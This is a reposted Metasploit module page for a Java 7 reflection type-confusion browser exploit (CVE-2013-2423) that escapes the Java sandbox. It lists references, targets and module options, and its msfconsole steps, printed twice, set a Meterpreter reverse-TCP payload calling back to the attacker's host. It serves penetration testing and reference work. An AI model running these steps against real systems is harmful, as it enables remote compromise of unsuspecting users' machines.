This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically throw the ActiveX control. Otherwise the applet is launched without click-to-play bypass.
Search Other Modules
Search Other Modules
Exploit Rank
- Excellent
Exploit Authors
- Jeroen Frijters < >
- juan vazquez < juan.vazquez [at] metasploit.com >
Vulnerability References
- CVE-2013-2423
- OSVDB-92348
- BID-59162
- http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0
- http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html
- http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/b453d9be6b3f
- http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warnin...
Exploit Targets
- 0 - Generic (Java Payload) (default)
- 1 - Windows x86 (Native Payload)
- 2 - Mac OS X x86 (Native Payload)
- 3 - Linux x86 (Native Payload)
Exploit Development
Similar Exploit Modules
- exploit/multi/browser/firefox_escape_retval
- exploit/multi/browser/firefox_queryinterface
- exploit/multi/browser/firefox_xpi_bootstrapped_addon
- exploit/multi/browser/itms_overflow
- exploit/multi/browser/java_atomicreferencearray
- exploit/multi/browser/java_calendar_deserialize
- exploit/multi/browser/java_getsoundbank_bof
- exploit/multi/browser/java_jre17_exec
- exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl
- exploit/multi/browser/java_jre17_jaxws
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/multi/browser/java_jre17_reflection_types
msf exploit(java_jre17_reflection_types) > show payloads
msf exploit(java_jre17_reflection_types) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_jre17_reflection_types) > set LHOST [MY IP ADDRESS]
msf exploit(java_jre17_reflection_types) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/multi/browser/java_jre17_reflection_types
msf exploit(java_jre17_reflection_types) > show payloads
msf exploit(java_jre17_reflection_types) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_jre17_reflection_types) > set LHOST [MY IP ADDRESS]
msf exploit(java_jre17_reflection_types) > exploit
Exploit Module Options
SRVHOST | The local host to listen on. This must be an address on the local machine or 0.0.0.0 (default: 0.0.0.0) |
SRVPORT | The local port to listen on. (default: 8080) |
SSL | Negotiate SSL for incoming connections |
SSLCert | Path to a custom SSL certificate (default is randomly generated) |
SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3) |
URIPATH | The URI to use for this exploit (default is random) |
ContextInformationFile | The information file that contains context information |
DisablePayloadHandler | Disable the handler code for the selected payload |
EXE::Custom | Use custom exe instead of automatically generating a payload exe |
EXE::FallBack | Use the default template in case the specified one is missing |
EXE::Inject | Set to preserve the original EXE function |
EXE::OldMethod | Set to use the substitution EXE generation method. |
EXE::Path | The directory in which to look for the executable template |
EXE::Template | The executable template file name. |
EnableContextEncoding | Use transient context when encoding payloads |
ListenerComm | The specific communication channel to use for this service |
VERBOSE | Enable detailed status messages |
WORKSPACE | Specify the workspace for this module |
HTML::base64 | Enable HTML obfuscation via an embeded base64 html object (IE not supported) (accepted: none, plain, single_pad, double_pad, random_space_injection) |
HTML::javascript::escape | Enable HTML obfuscation via HTML escaping (number of iterations) |
HTML::unicode | Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be) |
HTTP::chunked | Enable chunking of HTTP responses via "Transfer-Encoding: chunked" |
HTTP::compression | Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate) |
HTTP::header_folding | Enable folding of HTTP headers |
HTTP::junk_headers | Enable insertion of random junk HTTP headers |
HTTP::server_name | Configures the Server header of all outgoing replies |
TCP::max_send_size | Maximum tcp segment size. (0 = disable) |
TCP::send_delay | Delays inserted before every send. (0 = disable) |
沒有留言:
張貼留言